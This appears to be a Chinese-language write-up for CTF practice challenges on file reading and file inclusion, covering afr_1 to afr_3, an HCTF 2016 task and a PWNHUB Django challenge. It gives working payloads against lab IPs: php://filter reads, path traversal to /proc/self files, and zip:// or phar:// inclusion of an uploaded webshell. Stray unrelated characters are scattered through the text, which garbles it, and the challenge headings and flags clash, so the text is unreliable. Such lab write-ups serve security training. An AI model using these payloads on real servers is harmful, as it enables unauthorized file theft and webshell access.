平臺(tái)配套題目
afr_1
1吨铸、題目思路:
2抖所、payload
http://192.168.112.3/?p=php://filter/read=convert.base64-encode/resource=flag
3梨州、n1book{afr_1_solved}
afr_1
1、題目思路:
2田轧、payload
http://192.168.112.3/img../
3暴匠、n1book{afr_2_solved}
afr_3
1、題目思路:
2傻粘、payload
http://192.168.112.3:5000/article?name=/../../../../../proc/self/cmdline
http://192.168.112.3:5000/article?name=/../../../../../proc/self/cwd/server.py
3每窖、n1book{afr_3_solved}
兵者多詭(HCTF 2016)
1帮掉、題目考點(diǎn):文件上傳+文件包含漏洞
2、題目思路
3窒典、知識(shí)點(diǎn)利用
zip://協(xié)議的利用:試想倘若有一種情況限制文件后綴為php文件蟆炊,并且上傳文件只能傳jpg文件。allow_url_fopen參數(shù)與allow_url_include參數(shù)全部off的情況下瀑志。貌似之前所用偽協(xié)議都無(wú)效盅称,比較舊的版本可以使用00截?cái)啵窂介L(zhǎng)度截?cái)嗟群笫摇5侨魺o(wú)截?cái)嗦┒丛撊绾嗡跸ィ看朔N情況下可以使用zip偽協(xié)議,將木馬放入壓縮包中岸霹,再將壓縮包后綴修改為上傳白名單疾层,然后使用zip偽協(xié)議進(jìn)行包含。例如:zip://絕對(duì)路徑\需要解壓縮的文件%23子文件名贡避。
phar://協(xié)議的利用:phar://偽協(xié)議同zip偽協(xié)議痛黎。故上述問(wèn)題此協(xié)議也可解決。phar://cc.jpg/cc刮吧,與zip協(xié)議不同的是zip協(xié)議為絕對(duì)路徑湖饱,而phar協(xié)議為相對(duì)路徑。
我們上傳一個(gè)zip文件至服務(wù)器杀捻,當(dāng)通過(guò)zip://協(xié)議解析這個(gè)壓縮文件時(shí)井厌,會(huì)自動(dòng)將這個(gè)zip文件按照壓縮時(shí)的文件結(jié)構(gòu)進(jìn)行解析,然后通過(guò)“#+文件名”的方式對(duì)zip內(nèi)部所壓縮的文件進(jìn)行索引致讥。
4仅仆、參考:PHP文件包含及使用偽協(xié)議getshell
PWNHUB-Classroom
1、題目考點(diǎn):Django任意文件讀取漏洞
2垢袱、解題思路:
- Django CVE-2009-2659讀取墓拜。
- .pyc是python的字節(jié)碼文件,python3.5.2的字節(jié)碼文件在pycache/*.cpython-35.pyc中请契。讀取字節(jié)碼文件咳榜。
- 反編譯python3的字節(jié)碼文件。
- python代碼審計(jì)爽锥。
Pwnhub Web題Classroom題解與分析
3涌韩、參考:python任意文件讀取漏洞
